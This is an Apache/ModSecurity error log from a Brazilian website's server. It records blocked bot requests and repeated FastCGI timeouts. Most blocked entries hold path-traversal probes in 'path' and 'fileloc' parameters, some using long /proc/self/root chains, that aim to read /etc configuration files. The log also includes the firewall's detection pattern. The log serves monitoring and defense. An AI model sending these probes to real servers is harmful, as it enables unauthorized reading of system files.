[Wed Mar 18 00:14:09.133894 2026] [proxy_fcgi:error] [pid 2598:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:39430] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:14:11.049754 2026] [:error] [pid 29882:tid 140411540502272] [client 74.7.243.128:38688] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboYg0zinOy1jxa1j4e8TQAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:14:31.081870 2026] [proxy_fcgi:error] [pid 2598:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:40076] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:14:54.061903 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.244.43:40526] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboYrvu8EFLIOrSqIpuzxAAAAkw"]
[Wed Mar 18 00:14:55.905810 2026] [proxy_fcgi:error] [pid 11816:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:40854] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:15:05.855196 2026] [:error] [pid 29478:tid 140411733534464] [client 74.7.241.31:48536] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboYuQtyEfaPtzRucgXSkwAAAAE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 00:15:07.466728 2026] [:error] [pid 16560:tid 140411540502272] [client 74.7.228.61:56558] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboYu66gUSg3B_dEMdIhLQAAAdg"]
[Wed Mar 18 00:15:17.126073 2026] [proxy_fcgi:error] [pid 15051:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:41462] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:15:40.128186 2026] [proxy_fcgi:error] [pid 2598:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:42154] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:16:03.130945 2026] [proxy_fcgi:error] [pid 16560:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:42810] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:16:25.129819 2026] [proxy_fcgi:error] [pid 16560:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:43440] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:16:47.133774 2026] [proxy_fcgi:error] [pid 31803:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:44094] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:17:06.721126 2026] [:error] [pid 29478:tid 140411616036608] [client 74.7.241.31:48040] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboZMgtyEfaPtzRucgXS7gAAAA8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 00:17:08.112729 2026] [proxy_fcgi:error] [pid 19507:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:44682] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:17:29.125811 2026] [proxy_fcgi:error] [pid 17653:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:45228] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:17:40.583871 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.241.31:45804] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboZVOyqAr6etmhZHNphgwAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:17:50.045867 2026] [proxy_fcgi:error] [pid 17887:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:45942] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:18:11.132769 2026] [proxy_fcgi:error] [pid 29478:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:46532] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:18:33.121983 2026] [proxy_fcgi:error] [pid 19507:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:47168] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:18:54.127589 2026] [proxy_fcgi:error] [pid 17653:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:47730] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:19:04.331523 2026] [:error] [pid 31803:tid 140411607643904] [client 216.73.216.191:46563] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboZqOyqAr6etmhZHNphnwAAAFA"]
[Wed Mar 18 00:19:05.229567 2026] [:error] [pid 31803:tid 140411699963648] [client 216.73.216.191:42627] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboZqeyqAr6etmhZHNphoAAAAEU"]
[Wed Mar 18 00:19:08.338217 2026] [:error] [pid 17887:tid 140411733534464] [client 216.73.216.191:32312] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboZrAkwaGbbGflqUZC_NQAAAME"]
[Wed Mar 18 00:19:15.133838 2026] [proxy_fcgi:error] [pid 17653:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:48364] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:19:23.867582 2026] [:error] [pid 2598:tid 140411725141760] [client 74.7.243.128:49292] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboZuxj0p0SRWAqcjGG2GgAAAwI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:19:30.887587 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.241.31:58226] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboZwvu8EFLIOrSqIpu0MwAAAkw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:19:37.141806 2026] [proxy_fcgi:error] [pid 17653:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:48992] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:19:42.119392 2026] [:error] [pid 29882:tid 140411658000128] [client 74.7.241.31:45208] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboZzkzinOy1jxa1j4e8qQAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:19:54.731480 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.244.43:41382] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboZ2uyqAr6etmhZHNphwQAAAEI"]
[Wed Mar 18 00:20:00.161617 2026] [proxy_fcgi:error] [pid 11816:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:49610] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:20:04.132307 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.243.128:54984] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboZ5OyqAr6etmhZHNphzwAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:20:08.315410 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.228.61:49122] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboZ6Mdf6f5d65gmYZR7RwAAAsk"]
[Wed Mar 18 00:20:18.575672 2026] [:error] [pid 15051:tid 140411733534464] [client 216.73.216.191:35386] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.cache"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboZ8imAPhZkrhU8w4kbhQAAAIE"]
[Wed Mar 18 00:20:23.161853 2026] [proxy_fcgi:error] [pid 30077:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:50416] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:20:26.747269 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.241.31:34946] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboZ-sdf6f5d65gmYZR7UgAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:20:42.041807 2026] [:error] [pid 2598:tid 140411716749056] [client 216.73.216.191:19115] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboaChj0p0SRWAqcjGG2QQAAAwM"]
[Wed Mar 18 00:20:45.140630 2026] [proxy_fcgi:error] [pid 29478:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:51148] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:21:06.141801 2026] [proxy_fcgi:error] [pid 19507:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:51830] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:21:09.985155 2026] [:error] [pid 26799:tid 140411607643904] [client 216.73.216.191:21185] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboaJda6ubjKNq_cu4ZAtAAAA1A"]
[Wed Mar 18 00:21:21.731006 2026] [:error] [pid 29882:tid 140411607643904] [client 216.73.216.191:53089] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboaMUzinOy1jxa1j4e8tAAAARA"]
[Wed Mar 18 00:21:25.493175 2026] [:error] [pid 15051:tid 140411683178240] [client 216.73.216.191:54358] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboaNSmAPhZkrhU8w4kblAAAAIc"]
[Wed Mar 18 00:21:28.045805 2026] [proxy_fcgi:error] [pid 29478:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:52398] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:21:39.222643 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.241.31:43976] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboaQwkwaGbbGflqUZC_fgAAANI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:21:49.129866 2026] [proxy_fcgi:error] [pid 31803:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:52830] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:21:52.599196 2026] [:error] [pid 17653:tid 140411607643904] [client 216.73.216.191:16846] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboaUMdf6f5d65gmYZR7ZwAAAtA"]
[Wed Mar 18 00:22:11.029810 2026] [proxy_fcgi:error] [pid 15826:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:53162] AH01075: Error dispatching request to : (polling)
